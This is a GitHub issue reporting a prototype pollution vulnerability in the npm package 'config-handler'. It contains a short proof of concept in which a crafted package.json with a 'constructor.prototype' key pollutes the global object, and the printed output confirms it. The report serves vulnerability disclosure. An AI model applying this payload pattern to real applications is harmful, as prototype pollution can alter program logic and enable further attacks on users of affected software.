Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Vulnerable to Prototype Pollution #1

Open
sayoojbkumar opened this issue Aug 15, 2021 · 0 comments
Open

Vulnerable to Prototype Pollution #1

sayoojbkumar opened this issue Aug 15, 2021 · 0 comments

Comments

@sayoojbkumar
Copy link

Hey i recently found that your package is vulnerable to Prototype Pollution.

poc.js

const config = require('config-handler')();
console.log(test)
console.log(config)

package.json

{
"constructor":{
	"prototype":
		{"test":"polluted"}
	}
}

output
polluted
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@sayoojbkumar